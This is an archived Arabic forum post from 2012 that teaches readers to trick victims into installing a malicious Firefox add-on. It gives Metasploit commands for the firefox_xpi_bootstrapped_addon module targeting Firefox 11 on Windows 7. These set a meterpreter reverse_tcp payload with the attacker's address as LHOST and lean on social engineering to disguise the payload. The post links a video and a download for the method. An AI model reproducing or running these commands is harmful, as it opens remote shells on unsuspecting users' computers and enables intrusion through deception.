المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : [ شرح ] استعمال [xpi addon] ... واستغلالها علي [Firefox 11] علي [windows7]


rss
05-23-2012, 08:10 PM
http://img546.imageshack.us/img546/7296/93383359.png

إخــ‘ـواني أعـ‘ــضاء منتـــدي نــ‘ـــقطة التطــ‘ــوير(°dev-point°) ألكـ‘ــرام,,,

أرجـ‘ــو أن تكـ‘ـونوا فـ‘ـــي تمـ'ــام ألصـ'ــحة وألعـ‘ــافية!!

نـ‘ــأتي لــ‘ـكم أليـ'ــوم بمـ‘ــوضوع ورايـ‘ــح يكون خـ'ـاص ب كيفــ‘ــية

استــــ'ــعمال نضام الباك تراك وادواته الاساسية .

====================================

اليوم ان شاء الله ؛ معانا درس مهم جدا

يعني اليوم علي الخاص يعني ارسلنو اعضاء علي الامايل

وطلبو مني كيفية استغلال ثغارات متصفح لكن انا توجد طريقة رائعة

كيفية استغلال ثغرة

xpi addon




مثل مابينت في الشرح.


الهدف من العملية هو انشاء ؛ ملف ب صيغة الفايرفوكس ؛ او انتاج ملف خبيث سيتم ؛

تشغيله ب مجرد قبوله تثبيت الاضافة.
يعني هنا تدخل فيها الهندسة الاجتماعية لانا البايلود رايح يكون مختفي لكن ب صيغة
اخري





المهم رايح اعطيكم رابط الثغرة حتي تستفيدو اكثر

http://goo.gl/rfJg0 (http://goo.gl/rfJg0)


Exploit Usage Information

معلومات علي الثغرة المستعملة في درسنا اليوم

use exploit/multi/browser/firefox_xpi_bootstrapped_addon




msf exploit(firefox_xpi_bootstrapped_addon) > show payloads

msf exploit(firefox_xpi_bootstrapped_addon) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(firefox_xpi_bootstrapped_addon) > set LHOST [MY IP ADDRESS]
msf exploit(firefox_xpi_bootstrapped_addon) > exploit













الاصدار
Firefox 11

نوع النضام
windows7

====================================

جيد الان وصلنا الي تحميل الشرح

http://www.mediafire.com/?4vvfsj9esgfb268 (http://www.mediafire.com/?4vvfsj9esgfb268)


ولي مشاهدة الشرح علي اليوتيب





IiCyIFV8veY&feature=channel&list=UL






=====================================


الـ‘ـي هــنا ناتي الـ‘ـي نهاية الموضوع اتمني اني وفقت في طرحي لاتنسونا مــ’‘ــن دعائكم





اخــ’‘ــوكم السعيد(المجاهد الجزائري) . :32: